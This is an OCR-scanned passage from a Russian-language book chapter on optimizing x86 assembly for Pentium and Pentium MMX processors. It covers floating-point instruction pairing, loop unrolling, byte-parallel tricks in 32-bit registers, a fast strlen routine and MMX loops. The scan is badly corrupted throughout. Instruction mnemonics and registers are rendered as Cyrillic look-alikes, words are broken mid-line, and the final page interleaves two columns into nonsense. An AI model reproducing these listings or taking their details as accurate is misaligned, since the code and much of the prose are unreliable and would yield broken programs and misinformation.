РТР [а3] ; такт 7-8 
РОТР [53] ; такт 9-10 
РТР [с3] ; такт 11-12 


В другом случае можно поместить ЕАО, ЕЗОВ или что-нибудь еще между инструк- 
циями ЕМОГ, чтобы избежать задержек. 

Если выполнение инструкций с плавающей запятой пересекается, требуется, чтобы 
были независимые ветви, выполнение которых можно совместить. Если задана только 
одна большая формула, которую надо вычислить, можно попробовать просчитать ее час- 
ти формулы. Например, чтобы сложить шесть чисел, эту операцию нужно разделить на 
две ветви с тремя числами в каждой и сложить две ветви в конце. 


РЬО [а] ; такт 1 

РАБО [6] ; такты 2-4 

РОО [<] ; такт 3 

РАОО [4] } такты 4-6 

РХСН ; такт 4 

РАБО Ге] ; такты 5-7 

РХСН ; такт 5 

РАО [Е] ; такты 7-9 {задержка} 
РАБО ; такты 10-12 (задержка) 


Здесь есть задержка в один такт перед ЕАОО [4 |, потому что она ожидает результат: 
выполнения РКАОО [4] и задержка в два такта перед последней ЕАОО, потому что он: 
ожидает результата РАОО [Ё. Более поздняя задержка может быть опущена путек 
заполнения её несколькими целочисленными инструкциями, но с первой задержкой это 
Го не получится, так как целочисленная инструкция в этом месте приведет к тому, чт“ 
ЕХСН будет спариваться несовершенно. 

Первой задержки можно избежать, создав три ветви вместо двух, но это будет стоит 
дополнительной ЕТО, в этом случае не будет выигрыша, если только не нужно буде 
Складывать 8 чисел. 
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ааьь. И 
.. 


Не все инструкции с плавающей запятой могут выполняться параллельно. Выполнен, 
некоторых инструкций плавающей запятой лучше сочетается с целочисленными инс 
циями. Например, инструкция ЕБ!У занимает 39 тактов. Все время, кроме первого та 
выполнение этой инструкции может пересекаться с целочисленными инструкциям, 
но только в последние два такта она может сочетаться с инструкциями плавающей ая 


ЕТУ ; такт 1-39 (0-конвейер) 

ЕХСН ; такт 1-2 (У-конвейер, несовершенное спарива 
ЗНК БАХ, 1 ; такт 3 ({О-конвейер) 

ТМС ЕВХ ; такт 3 (У-конвейер} 

СМС у ; такт 4-5 (не спаривается) 

РАБО [х] ; такт 38-40 (О0-конвейер, ждет, пока ЕРО не освободи: 
ЕХСН ; такт 38 (У-конвейер)} | 

ЕМОЬ [у] ; такт 40-42 (0-конвейер, ждет результат Е01\)} 


Первый ЕХСН спаривается с ЕОГУ, но занимает дополнительный такт, потому что 
за ней не следует инструкция плавающей запятой. Пара 5НК / ПС начинает свое выпот. 
нение до того, как будет закончено выполнение ЕГЛУ, но вынуждена подождать, пока 
свое выполнение закончит ЕХСН. 

Если нет ничего, чтобы поместить после инструкции плавающей запятой, которая 
может выполняться одновременно`с целочисленной инструкцией (ЕГУ, ЕЗОКТ), можно 
поместить чтение значения какой-нибудь переменной из памяти, которое может понадо- 
биться в дальнейшем, чтобы она на 100% была в кэше. 


ЕБТУ ОНОвр РТВ ГЕВХ] 
СМР {Е51],Е5Т 
ЕМОЬ ОНОВО РТК ГЕЗТ] 


Здесь загружается значение [ЕЗ1] в кэш, в то время как вычисляется ЕБТУ (результат 
самой операции сравнения не важен). 

В разд. 6.28 приведен полный список инструкций с плавающей запятой и инструкций. 
с которыми они могут спариваться. 

Никаких потерь при использовании переменных из памяти в инструкциях плавающей 
запятой не происходит, потому что модуль арифметических вычислений стоит на один 
шаг дальше в конвейере, чем модуль чтения. Однако при сохранении данных может 
случиться задержка аналогичная задержке АС]: выполнение инструкции ЕЗТ или ЕЗТР 
с переменной в памяти в качестве операнда занимает два такта, но данные должны быт 
готовы на предыдущем такте, поэтому задержка будет в один такт, если значение. кото 
рое нужно сохранить, не будет готово еще на предыдущем такте. 


РО [а1)] ; такт 1 
РАРО [а2] ; такт 2-4 
ЕЬО 161] ; такт 3 
РАОО 162] ; такт 4-6 
ЕХСН ; такт 4 
ЕОТР [а3] ; такт 6-7 
ЕОТР 163] ; такт 8-9 
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ЕЗТР задерживается на один такт, потому что результат ЕАРО не был готов 
елыдущем такте. Во многих случаях нельзя скрыть этот тип задержек без организа- 
кода с плавающей запятой в четыре ветви или помещения внутрь каких-то целочис- 

ленных инструкций. Два такта на стадии выполнения инструкции Е5Т(Р) не могут спари- 
ваться или пересекаться с любой другой последующей инструкцией. 
Инструкции с целочисленными операндами, такими, как НАЮР, НЗОВ, ЕМУ, 

Яр, ЕСОМ можно разделить на простые операции, чтобы улучшить пересекаемость 

выполнений инструкций: 


ЕГГО [а} ; с1оск сус1е 1-3 

РТМОЬ 15] ; с1осКк сус1е 4-9 
Разделить на: 

ЕТЬО [а] ; такты 1-3 

Е1ЬО [5] ; такты 2-4 

ЕМОЬ ; такты 5-7 


В этом примере экономится два такта при сочетании выполнения двух инструкций ЕТО. 


6.25. Оптимизация циклов (все процессоры) 


Анализируя код программ, можно увидеть, что больше всего ресурсов потребляют 
внутренние циклы. Используя язык ассемблера, можно существенно оптимизировать их. 
А остальную часть программы можно оставить написанной на языке высокого уровня. 

Во всех приведенных ниже примерах предполагается, что все данные находятся 
в кэше первого уровня. Если скорость ограничивается из-за того, что данные загружа- 
ются в кэш, нет никакого смысла оптимизировать инструкции. Тогда лучше сконцен- 
трироваться на правильной организации данных (разд. 6.7). 


6.25.1 Циклы в Р1 и РММХ 


Как правило, цикл содержит счетчик, определяющий, сколько раз он должен повто- 
риться, и в большинстве случаев массив данных, в один элемент которого записываются 
данные или считываются из него каждую итерацию. 

Эта процедура на С может выглядеть так: 

ус19 Срапдае$1ат (116 * А, 11% * В, 1ПЕ №) 
| . 

11 1; 

ог (1=0; 1<№; 1++) В[1] = -А[ 1]; 
} 


Переводя ее на ассемблер получается следующий код; 
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_Свапае$1ап РКОС МЕАК 





РОЗН ЕЗТ 
РОЗН ЕО1 
А Е09 РИОВР РТВ [Е5$Р+12] 
В Е00 ОИОКО РТВ [Е5Р+16] 
М Е00 ОНОВО РТВ [Е5Р+20] 
МОУ ЕСХ, [№] 
ЗЕСХО Ь2 
МОУ ЕЗТ, [А) 
МОУ ЕРТ, [В] 
СО 
1: 0050 
| МЕС БАХ 
$17050 
ТООР Ь} 
02: РОР БОТ 
РОР ЕТ 
ВЕТ ; нет дополнительного рор, если объявлено 
; соглашение о вызове сдес1 
| _СВапае$19п ЕМОР 
Это выглядит как достаточно красивое решение, но оно не самое оптимальное, пото- 


му что использует медленные неспариваемые инструкции. Каждая итерация занимает 11 
тактов при условии, что все данные находятся в кэше первого уровня. 


| 6.25.1.1. Использование только спариваемых инструкций (Р1 и РММХ). 


| МОУ ЕСХ, [М] 

| МОУ ЕЗТ, [А] 

| ТЕЗТ ЕСХ, ВСХ 

| 72 $НОВТ Ь2 

| МОУ ЕОТ, [В] 

| 11: — МОУ БАХ, [ЕЗГ] и 

| Хок БВХ, ЕВХ ; У (спаривается} 
| АОр ЕТ, 4 Ба 
| ЗОВ ЕВХ, БАХ ; У (спаривается) 
| МОУ [Ерт], ЕВХ а 

| АБР ЕТ, 4 ; У (спаривается} 
| ЕС ЕСХ ;щ 

| 9%2 Ь1 , ; У (спаривается} 


| 
| 2: 
| 
| 











4 
Здесь используются только спариваемые инструкции. Теперь они занимают том 
такта на итерацию. Можно получить ту же самую скорость, не разделяя инструки 
МЕС, но другие неспариваемые инструкции все же стоит разделить. 





> 
( 
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6.25.1.2. Использование одного регистра как счетчика и индекса. 


МОУ ЕТ, [А] р 
МОУ ЕБТ, [В] 
МОУ СХ, [№] 
ХОВ ЕБХ, ЕОХ 
ТЕЗТ ЕСХ, ЕСХ 
92 ЗНОВТ 12 
Ь}: МОУ БАХ, [Е51+4*ЕОХ] РА 
МЕС БАХ ри 
МОУ [Е01+4*ЕОХ], БАХ РИА 
ТАС ЕОХ ; У (спаривается} 
СМР ЕОХ, БСХ Ц 
УВ Ь1 ; У (спаривается) 


2: 


Использование одного регистра как счетчика и индеска уменьшает количество инст- 
рукций в теле цикла, но он по-прежнему занимает 4 такта, так как здесь присутствуют 
две неспариваемые инструкции. 

6.25.1.3. Пусть конечное значение счетчика равняется нулю (РГ и РММХ). Можно 
избавиться от инструкции СМР в предыдущем коде, сделав так, чтобы последнее значе- 
ние счетчика равнялось нулю, и использовать флаг нуля как знак того, что цикл закончен 
(как сделано в примере пункта 6.25.1.1). Один вариант заключается в том, чтобы испол- 
нить цикл задом наперед, взяв последний элемент первым. Тем не менее, кэш данных 
оптимизирован для их получения в прямом порядке, а не в обратном, поэтому если веро- 
ятны промахи кэша, следует задать значение счетчика -М и увеличивать его значение до 
нуля. Базовые регистры тогда должны указывать на конец массива, а не на его начало. 


МОУ ЕЗТ, [А] ° 
МОУ БАХ, [№] 
МОУ БОТ, [В] 
ХОК ЕСХ, ЕСХ 
ЪЕА Е51, [Е51+4*ЕАХ] ; указывает на конец массива А 
ЗОВ ЕСХ, ЕАХ ; -№ 
ЪЕА ЕБТ, [Е01+4*ЕАХ] ; указывает на конец массива В 
Мл ЗНОВТ №2 
1: МОУ БАХ, [Е51+4*ЕСХ] ; 1 
МЕС БАХ Ч 
МОУ [Е01+4*ЕСХ], БАХ ра 
МС ЕСХ ; У (спаривается) 
Ма Ьу НВ 
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Однако цикл по-прежнему занимает 4 такта из-за плохой спариваемости инструкций. 
(Если адреса и размеры массива являются константами, можно сохранить два регистра), 
А теперь посмотрим, как можно улучшить спариваемость. 

6.25.1.4. Спаривание вычислений в цикле (Р1 и РММХ). Можно улучшить пари 
ние, перемешав инструкции вычисления с инструкциями управления циклом. ТЬ ВОЗ. 
можность поместить что-нибудь между 'ПМС ЕСХ' и 'ЛЧА ТГ, это должно ть семто, 
что не влияет на флаг нуля. Инструкция 'МОУ [ЕБН+4*ЕСХ] ЕВХ после МС ЕСХ' сге- 
нерирует задержку АСТ, поэтому придется выбирать более искустный подход. 


МОУ БАХ, [М] 
ХОВ ЕСХ, ЕСХ 
УНЬ ЕАХ, 2 ; А*М 
95 ЗНОВТ 13 
МОУ БУТ, [А] 
МОУ ЕОТ, [В] к 
ЕСХ, БАХ ; - 
В ЕТ , БАХ ; указывает на конец массива № 
АБО вот, ЕАХ ; указывает на конец массива № 
! 
9МР ЗНОВТ №2 
Би 
1: МОУ [ЕОТ+ЕСХ-4], БАХ ; 
Ь2: МОУ БАХ, [ЕЗТ+ЕСХ] ; У (спаривается} 
БАХ, -1 ; 1 
о ЕСХ, 4 ; У (спаривается) 
' . 
БАХ Ч 
на Ь} ; У (спаривается) 
МОУ [ЕРТ+ЕСХ-4], БАХ 
3: 


Здесь используется альтернативный способ, чтобы посчитать отрицательное ры 
ЕАХ: инвертирование всех битов и инкремент. Причина, по которой задействует ть 
метод, состоит в использовании трюка с инструкцией ПМС: ПМС не изменяет ф ыы 
носа, в то время как АОО наоборот. АР используется вместо ПМС, что увели р 
счетчик цикла и управлять им с помошью флага переноса, а не флаг нуля. Тогд ть 
поместить ПС ЕАХ' между ними без вреда для флага переноса. Может возн м 
мысль, что следует использовать ТЕА ЕАХ[ЕАХ+1]' вместо МС БАХ ‚ по А Вр 
мере, он не меняет никаких флагов, но инструкция ГЕА сгенерирует Задерку, т рая 
этому это не лучшее решение. Обратим внимание, что трюк с инструкцией ры Я 
не меняет флаг переноса, будет полезен только на Р1 и РММХ, так как на , 
будут сгенерированы частичные задержки регистра флагов. ет толь 3 

Здесь удалось добиться совершенного спаривания, и цикл теперь занима ин 
такта. Нужно ли увеличивать значение счетчика цикла на |1 (как в пункта 6. и ла 
4 (как в сделано здесь) Г ЭТО дело вкуса, никакого влияния на время выпол 
это не окажет. 








м 
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6.25.1.5. Пересечение времени выполнения одной операции с другой (Р1 и РММХ). 
Метод, использованный в примере пункта 6.25.1.4, подходит далеко не во всех случаях, 
поэтому можно поискать другие способы улучшения спариваемости. Один из путей 
реорганизовать пикл — и сделать это так, чтобы конец выполнения одной операции пере- 
секался с началом выполнения другой. Назовем это свернутым циклом. У свернутого_ 
цикла в его конце находится инструкция, выполнение которой будет закончено в сле- 


дующем повторении. Фактически, в примере пункта 6.25.1.4 последняя команда МОУ 
сларивается с первой. Исследуем этот метод поподробнее. 


МОУ БГ, [А] 

МОУ БАХ, [№] 

МОУ БОТ, [В] 

ХОВ БСХ, ЕСХ 

ТЕА Е5Т, [Е51+4*ЕАХ] ; указывает на массив А 

$0В ЕСХ, БАХ ; -м 

ТБА ЕБТ, [Е01+4*ЕАХ | ; указывает на массив В 

92 ЗНОВТ 13 

ХОВ ЕВХ, ЕВХ 

МОУ БАХ, [Е51+4*ЕСХ] 

ТМС ЕСХ 

ЧА ЗНОВТ 12 
1: ЗОВ ЕВХ, КАХ ;ц 

МОУ БАХ, [651+4*ЕСХ] } У (спаривается} 

МОУ [Е21+4*ЕСХ-4], ЕВХ РА" 

ТЫС ЕСХх ^ ; У (спаривается} 

МОУ БВХ, 0 п 

М2 Ь1 ; У (спаривается) ` 
Ь2: ЗОВ ЕВХ, ЕАХ 

МОУ [Е21+4*ЕСХ-4], ЕВХ 


13: 


Здесь начинается считывание второго значения до того, как сохраняется первое, 
иэто, естественно, улучшает возможность спаривания. Инструкция 'МОУ ЕВХ,0' была 
помещена между ПМС ЕСХ' и 'ЛМИ. 11' не для того, чтобы улучшить спаривание, а для 
того, чтобы избежать задержки АС]. 

6.25.1.6. Развертывание цикла (РТ и РММХ). Один из самых часто использующихся 
способов улучшить спаривание — это сделать две операции на каждую итерацию, кото- 
рых в этом случае станет в два раза меньше. Это называется развертыванием цикла. 


МОУ ЕТ, [А] 
МОУ БАХ, [М] 
МОУ БЕРТ, [В] 
ХОВ ЕСХ, ЕСХ 
БЕЛ ЕЗТ, [Е51+4*БАХ] 


; указывает на конец массива А 
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$0В ЕСХ, ЕАХ ; -м 

ЪЕА ЕОТ, [Е01+4*ЕАХ] ; указывает на конец массив: 

98 ЗНОВТ 12 

ТЕЗТ АГ, 1 ; тестируем М на нечетно: 

95 ЗНОВТ 1} 

МОУ БАХ, [Е51+4*ЕСХ] ; № нечетно 

МЕб БАХ 

МОУ [601+4*ЕСХ], БАХ 

ТМС ЕСХ . ; дополнительная операция, 

; если счетчик нечетен 

95 ЗНОВТ 12 м= 1] 
1: МОУ БАХ, [Е51+4*ЕСХ] п 

МОУ ЕВХ, [651+4*ЕСХ+4] ; У (спаривается) 

МЕС БАХ 1 

МЕС ЕВХ ;ц 

МОУ [Е01+4*ЕСХ], ЕАХ НА 

МОУ [Е01+4*ЕСХ+4], ЕВХ ' ;$ У (спаривается) 

АО БСХ, 2 п З 

7 пы уу (спаривается) 1 
Ь2: } 


Теперь производится две операции одновременно, что приводит к лучшему спарива- 
нию. Приходится тестировать М на нечетность, и если оно нечетно, то делается дополни- 
тельная операция вне цикла, потому что внутри его можно сделать только четное коли- 
чество операций. | 

В цикле есть задержка АСТ, генерируемая первой инструкцией МОУ, потому что ЕСХ 
увеличивается на 1 в предыдущем такте, и поэтому для двух операций цикл занимает 6 тактов. 

6.25.1.7. Реорганизация цикла для удаления задержки АС] (Р1 и РММХ). 


МОУ БУТ, [А] 

МОУ БАХ, [№] 

МОУ ЕОТ, [В] 

ХО ЕСХ, ЕСХ 

ЪЕА БТ, [Е51+4*ЕАХ)] ; указывает на конец массива А 

ЗОВ ЕСХ, БАХ ; -М 

ЪЕА БОТ, [Е21+4*ЕВАХ] ; указывает на конец массива В 

95 ЗНОВТ 13 

ТЕЗТ АЬ, } ; тестируем № на нечетность 

95 ЗНОВТ №2 

МОУ БАХ, [Е51+4*ЕСХ] ; дополнительная операция, 
; если счетчик нечетен 

МЕС БАХ ; нет возможности к спариванию 

МОУ [Е01+4*ЕСХ-4], ВАХ 

ТАС БСХ ; делаем счетчик четным 

9М5 СНОВТ 12 ` 


МОР ; добавляем МОР, если 9№2 Ъ2 не предсказуем 


МОР 
УМР 
МЕС 
МЕС 
МОУ 
МОУ 
МОУ 
МОУ 
АБ 
М2 
МЕС 
МЕС 
МОУ 
МОУ 





а 6. Оптимизация для процессоров семейства Репвит 


ЗНОВТ 13 

ЕАХ 

ЕВХ 

[601+4*ЕСХ-8], БАХ 
[Е01+4*ЕСХ-4], ЕВХ 
БАХ, [Е$1+4*ЕСХ] 
ЕВХ, [Е51+4*ЕСХ+4] 
ЕСХ, 2 

1 

ЕАХ 

ЕВХ 

[Е01+4*ЕСХ-8], БАХ 
[Е01+4*ЕСХ-4], ЕВХ 


Трюк заключается в том, чтобы найти пару инструкций, которые не используют счет- 
чик цикла в качестве индекса, и реорганизовать цикл так, чтобы счетчик повышал свое 
значение на предыдущем такте. В этом случае реализация приближается к 5 тактам для 
двух операций, что близко наилучшему варианту. 

Если кэширование данных критично, можно улучшить скорость, объединив массивы 
АиВ в один массив, так чтобы каждый В[] находился непосредственно за соответст- 
вующим ему А]. Если структурированный массив выровнен по крайней мере на 8, тогда 
ВЕ] всегда будет находится на той же линии кэша, что и А[]], и всегда будет случаться 
кэш-промах при записи в В[1. Это, конечно, сглаживается приростом производительно- 
сти в других частях программы, но обязательно нужно взвесить все за и против. 


6.25.1.8. Развертывание более чем на 2 (Р1 и РММХ). Можно рассмотреть возмож- 
ность выпонение более чем двух операций за одно повторение, чтобы снизить количест- 
во действий, необходимых для организации цикла. Но так как в большинстве случаев 
время, требуемое для выполнения таких действий, можно снизить только на один такт, 
то развертывание цикла в четыре раза сохранит только 1/4 такта на операцию, что вряд 
ли стоит усилий, которые будут на это потрачены. 

Недостатки слишком большого развертывания цикла следующие: 


необходимо просчитать № МОРОГО К, где К - это коэффициент разворачивания, 
и сделать М МОРОГО К операций до или после основного цикла, чтобы выполнить 
недостающее количество операций. На это уйдет дополнительный код и плохо пред- 
сказуемые операции условного перехода. И, конечно, тело цикла станет больше; 
участок кода обычно выполняется в первый раз гораздо дольше (чем больше код, тем 
больше будут связанные с этим потери, особенно, если № невелико); 

увеличение кода делает работу с кэшем менее эффективной; 





(спаривается } 


{спаривается} 


<зеюзя<чясся 


(спаривается} 
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ш одновременная обработка нескольких 8- или 16-битных операндов в 32-битных реги. 
стра (Р1 иРММХ). 


Если нужно обрабатывать массивы, состоящие из 8- или 16-битных операндов, появ. 
ляются проблемы с развернутыми циклами, потому что нельзя спарить две операции 
доступа к памяти. Например, "МОУ АГ.[Е$] / МОУ ВЕ.[Е$1+1|' не будут спариваться. 
так как оба операнда находятся внутри одного и того же двойного слова памяти. Но есть 
продвинутый способ обрабатывать сразу два байта за раз в одном 32-битном регистре. 

Следующий пример добавляет 2 ко всем элементам массива байтов. 


МОУ ЕЗГ, [А] ; адрес массива байтов 
МОУ ЕСХ, [М] ; количество элементов в массиве байтов 
ТЕЗТ ЕСХ, ЕСХ ; Проверяем, равен ли М нулю 
а ЭЗНОВТ №2 
МОУ БАХ, (Е$Т] ; считываем первые четыре байта 

1: МОУ ЕВХ, КАХ ; копируем в ЕВХ 
АМ БАХ, 7Е7Р7Е7ЕН ; получаем младшие 7 битов байта в ЕАХ 
ХОВ БВХ, ВАХ ; получаем старший бит каждого из байтов 
АРО БАХ, 02020202Н ; добавляем значение ко всем четырем 

; байтам 

ХОВ ЕВХ, ЕАХ ; снова комбинируем биты 
МОУ БАХ, [Е51+4] ; считываем следующие четыре байта 
МОУ [Е$Т1], ЕВХ ; сохраняем результат 
АБО Е5Т, 4 ; повышаем значение указателя на 4 
ЗОВ ЕСХ, 4 ; понижаем значение счетчика цикла 
ЗА 1 ; цикл 


Ь2: 


Этот цикл занимает 5 тактов для каждых 4 байт. Массив, разумеется, должен быть 
выравнен на 4. Если количество элементов в массиве не кратно четырем, тогда можно 
добавить в конец несколько байтов, чтобы сделать его размер кратным четырем. К нему 
будет происходить обращение за его концом, поэтому нужно убедиться, что тот не нахо- 
дится в конце сегмента, дабы избежать ошибки общей защиты. 

Следует обратить внимание, что перед прибавлением сохраняется старший бит каж- 
дого байта, чтобы не испортить их значение (если результат сложения превысит 256). 
Здесь используется ХОК, а не АБО, при возврате младшего бита на место по той же са- 
мой причине. 

Инструкции 'АРО ЕЗ1,4' можно избежать, если использовать счетчик цикла 
в качестве индекса, как это сделано в примере пункта 6.25.1.3. Тем не менее, 
в результате количество инструкций в цикле будет нечетно, а значит, одна инструкция 
будет не спарена, и цикл по-прежнему займет 5 тактов. Нужно сделать инструкцию пере 
хода неспаренной, что сохранит один такт после последней операции, если инструкция 
предсказывается неверно, и придется потратить дополнительный такт в коде пролога, 
чтобы установить указатель в конец массива и вычислить -М, поэтому эти два метода 





будут иметь одинаковую скорость. Метод, представленный в выше, является самым про 
стым и самым коротким. 
Следующий пример находит длину строки, заканчивающейся нулем, путем поиск. 


первого байта, равного нулю. Он быстрее выполнится быстрее, чем команда ВЕ 
$САЗВ. 


СТКЬЕМ  РКОС МЕАВ | 
МОУ БАХ, (Е5Р+4 ] ; получаем указатель 
МОУ ЕОХ, 7 
АБО БОХ, БАХ ; Указатель+7 исп. в конце 
РОЗН ЕВХ 
МОУ ЕВХ, [БАХ ] ; Читаем первые 4 байта 
АО ЕАХ, 4 ; повышаем значение указателя 
21: ЪЕА ЕСХ, [ЕВХ-01010101Н] ; вычитаем один из каждого байта 
ХО ЕВХ, -1 ; инвертируем все байты 
АМ БСХ, ЕВХ р; и эти два 
МОУ ЕВХ, [БАХ] ; читаем следующие 4 байта 
АБО БАХ, 4 ; повышаем значение указателя 
АМО ЕСХ, 80808 080Н ; тестируем все биты знаков 
92 Ь1 


; нет нулевых байтов, продолжаем 
; ЦИКЛ 


ТЕЗТ ЕСХ, 0000808 0Н ; тестируем первые два байта 


9 №2 $НОКТ 12 

ЗНА ЕСХ, 16 ; не в первых двух байтах 

АБО БАХ, 2 

2: ЗНЬ СЬ, 1 ; используем флаг переноса, 

; чтобы избежать переход 

РОР ЕВХ 

ВВ БАХ, ЕОХ ; высчитываем длину 

КЕТ 


ЭТАБЕМ ЕМОР 


Здесь снова используется метод пересечения конца выполнения одной операции с на- 
чалом выполнения другой, для улучшения спаривания. Здесь мы не стали разворачивать 
цикл, так как количество его повторений относительно невелико. Строка, конечно, 
должна быть выравнена на 4. Код будет считывать несколько байт за строкой, поэтому 
та не должна располагаться на границе сегмента. 

Количество инструкций в цикле нечетно, поэтому одна из них неспарена. Сделав не- 
спаренной инструкцию перехода, а не какую-либо другую, мы сэкономим один такт, 
если инструкция перехода будет предсказана неверно. 

Инструкция "ГЕЗТ ЕСХ,00008080Н' неспариваема. Однако можно использовать здесь спа- 
Риваемую инструкцию 'ОК. СН,СГ вместо нее, но тогда придется поместить МОР или что- 
НИибудь еще, чтобы избежать потерь из-за последовательных инструкций перехода. Другая 
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а 


проблема с 'ОВ СН,СГ! состоит в том, что она вызовет частичную задержку регистра нар 
Р2 или РЗ. Поэтому было выбран использование неспариваемой инструкции ТЕЗТ. 

Обработка 4 байт за раз может быть довольно сложной. Код использует формул, 
которая генерирует ненулевое значение, для байта только тогда, когда он равен Нудю 
Это делает возможным протестировать все четыре байта за одну операцию. Этот алго. 
ритм включает вычитание 1 из всех байтов (в инструкции 1.ЕА). Здесь не сохраняется. 
старший бит перед вычитанием, как это было сделано в предыдущем пункте, поэту 
операция вычитания может испортить значение следующего байта в ЕАХ, но Только 
если текущий равен нулю, но в этом случае не важно, что будет со следующим байтом, 
Если искать нулевой байт в обратном порядке, пришлось бы считывать двойное слов 
повторно после обнаружения нуля, а затем протестировать все четыре байта, чтобы най. 
ти последний ноль, или использовать ВЗ\У/АР для изменения порядка байтов. 

Если нужет поиск байта с отличным от нуля значением, можно использовать ХОв 
всех четырех байт со значением, которое нужно найти, а затем использовать метод при. 
веденный выше для поиска нуля. 

6.25.1.9. Циклы с операциями ММХ (РММХ). Обработка нескольких операндов в од. 
ном регистре проще на ММХ-процессорах, потому что в них присутствуют специальные 
инструкции и регистры именно для этих целей. 

Возвращаясь к задаче добавления двойки ко всем байтам массива, можно воспользо- 
ваться расширенным набором инструкций ММХ. 


Рю. 


„Дака 
АТОМ 8 
АБРЕМТЗ 20 0202020202020202% ; указываем байт, который нужно 
; добавить 8 раз 
А | ? ; адрес массива байтов 
М |) ? ; количество итераций 
‚„ соде 
МОУ ЕЗТ, [А] 
МОУ БСХ, [№] 
МОУ ММ2, ГАОРЕМТ$] 
МР ЗНОВТ №2 
; Кор оЁ 1оор 
Ь1: МОУ [851-88], ММО ; сохраняем результат 
2: МОУ ММО, ММ2 ; загружаем слагаемые 
РАБОВ ММО, [Е5Г} ; обрабатываем 8 байт за одну операци® 
АБО ЕЗТ, 8 
ВЕС ЕСХ 
Ма Ь1 
МОУО 1Е51-8], ММО ; сохраняем последний результат 


БММ$ 
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> пара ооо роваросиовоковь 
пез нонаа нано ваное 
Мио ооо риа ооо ни ба о овса сор ни вов ооонзонсонозово 
. п ооова очи уиоочоваюани 


Инструкция сохранения помешена после инструкции управления циклом чтоб 
избежать задержки сохранения. Вы 

Этот ик занимает 4 такта, потому что инструкция РАООВ не спаривается с'Ар 
Е9Ь 8 .( нструкция ММХ с доступом к памяти не может спариваться с не-ММХ 
рукцией и с другой инструкцией ММХ с доступом к памяти). Можно избав 
от'АРО ЕШ, 8', используя в качестве индекса ЕСХ, но это приведет к задержке АСТ 

Так как затраты на управление циклом значительны, мы можем захотеть разве! | 
на. рнут 


инс 
иИТЬС 


„.даса 
АГТОМ 8 
АБОЕМТЗ РО 02020202020 ; 
рр 202021 ; значение, добавляемое к 8 байтам 
Бр 
Е о } ; адрес массива байтов 
М нове : } количество итераций 
МОУО ММ2, ГАРОЕМТ$] 
МОУ БУГ, [А] 
МОУ ЕСХ, [М] 


МОУО ММО, ММ2 
МОУО ММ1, ММ2 

ЬЗ: РАБОВ ММО, ГЕЗТ] 
РАБОВ ММ1, [Е51+8] 


МОУО (Е51], ММО 
МОУО ММО, ММ2 
МОУО [Е$1+8], ММ1 
МОУ ММ1, ММ2 

АБО ЕТ, 16 

БЕС ьСхХ 

М2 Ь3 

ЕММ$ 


от развернутый цикл занимает 6 тактов на выполнение 
струкции РАОРВ не спа 
‘охранения. 


Испо й 
о льзование инструкций ММХ приводит к большим потерям, если вместе с ними 
ри уются инструкции с плавающей запятой, поэтому могут быть ситуации, когда 
ные регистры будут предпочтительнее. 
6.25 й 
и Циклы с инструкциями с плавающей запятой (Р1иРММХ). Методы опти- 
циклов с инструкциями с плавающей запятой аналогичны инструкциям с цело- 


ментами, хотя ИН К И 
5 щеи им 
р > 


озьмем следующий код на языке С: 


при обработке 16 байтов 
риваются. Две ветви перемешаны, чтобы избежать задержки 


ИС 


ЧИ 


‚ 
' 
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име 
ТЕТ, п; Пр р . 
м доцЬ1е *Х; у р5т2Е = 8 ; размер данных 
дочь е * У; $: ТЕ 0512Е БО 4 
ЗочЬ1е ВА; | а. СНТЕТСООМТ = 2 
Рог (1=0; 1<п; 1++) [1] = [1] - БА * ХЕ]; ЗЕ 
в : ЗНТЕТСООМТ = 3 
ий (ал 
Он является ключевым участком при решении линейных уравнен ( горитм ЕМОТР 
АХРУ). МОУ БАХ, [№] ; количество элементов 
о ; размер данных МОУ ЕСХ, 3*05176 ; погрешность счетчика 
2$12Е в 8 АК, Гн] . , количество элементов нь БАХ, ЗНТЕТСООМТ ОЕ” 
; на Х ; = 
МОУ ЕСТ, [Х] ' ть на у МОУ ЕЗТ, [Х] ; указатель на Х 
МОУ ЕБТ, [У] ТУ ЗОВ ЕСХ, ЕАХ ; (3-№) *05т2Е 
ХОВ БОСХ, ЕСХ . , МОУ Е0Т, [У) ; указатель на У 
ЪЕА ЕЗТ, [ЕЗТ+ОЗТАЕ*ЕАХ] ; указывает на конец Х $0В ЕЗТ, ЕСХ ; конец указателя - погрешнос 
Х, БАХ Г” $9В БОТ, ЕСХ 
ть ЕТ [Е01+0$12Е*ЕАХ] ; указывает на коне у ЕТ вСХ, Е СХ 
В ЗНОВТ 13 ; тестируем М == © ИЛИ нет ЕР 0$12Е РТВ [Е51+БСХ] ; первый Х 
ТВ [РА] . №5 ЗНОВТ 2 ; 
О Е ТЕ 81405 18Е*ЕСХ] РА * Х[0] ик И р ра "ТВ А] меньше чем 4 операции 
МР ЗНОВТ 12 ; переходим к циклу ЕО 2$12Е РТВ [Е$1+ЕСХ+0517Е] 
: ЕО 25126 РТВ [РА] . . ЕМОЬ 2$12Е РТВ [РА] 
Г ЕМОТ 2512Е РТК [Е51+0512Е*ЕСХ] $ ВА * Хх] . . РУСН 
ЕХСН ; получаем старый резуль’ ЕЗОВВ — О512Е РТВ [ЕРТ+ЕСХ] 
РТР О517Е РТВ [ЕР1+0$12Е*ЕСХ-05$12Е] ; сохраняем а ЕХСН 
. 1 
12:  РЗОВВ  0510Е РТВ [ЕРТ+О$Т2Е*ЕСХ] ; вычитаем из ЕО 2512Е РТВ [Е51+ЕСХ+2*0512Е] 
ТС ЕСХ ; увеличиваем значение В 0512Е РТВ [БА] 
. . 1 
ринлеков на ЕЗОВВ = 0517Е РТВ [ЕР1+ЕСХ+0512Е] 
92 ь1 1 следни? ЕХСН $1(2) 
Е5ТР 2512Е РТВ [ЕР!+0$12Е*ЕСХ-0512Е] ; сохраняем по СТР 2$12Е РТВ [ЕБТ+ЕСХ] 
; резу РЗОВЕ  0512Е РТВ [Е01+ЕСХ+2*0512Е] 
ЬЗ; РХСН 
Здесь используются те же методы, что и в примере пункта 6.25.1.5: ети р ЕТ рати рт Е 
.. М до 0. о т 
в качестве индекса и последовательность отрицательных значений от Мд ЕХСН 
выполнения одной операции пересекается с началом выполнени другой. , ож ЕСТР 2$12Е РТВ [ЕБТ+ЕСХ+2*0512Е] 
Смешение различных инструкций плавающей запятой работает прекрасно: ржи А ро сх, 3*О5т7Е 
льтата. зад 5 Ъ ; ЦИКЛ 
ЕЗОВЕ заполняется ЕУТР предыдущего резу. й , , 
такта меж ПЗОВК | РТР заполняется инструкциями управления циклом и пер®ь, 2: И АТ сх] ; завершаем оставшуюся операц 
в 3 такта между благол + 
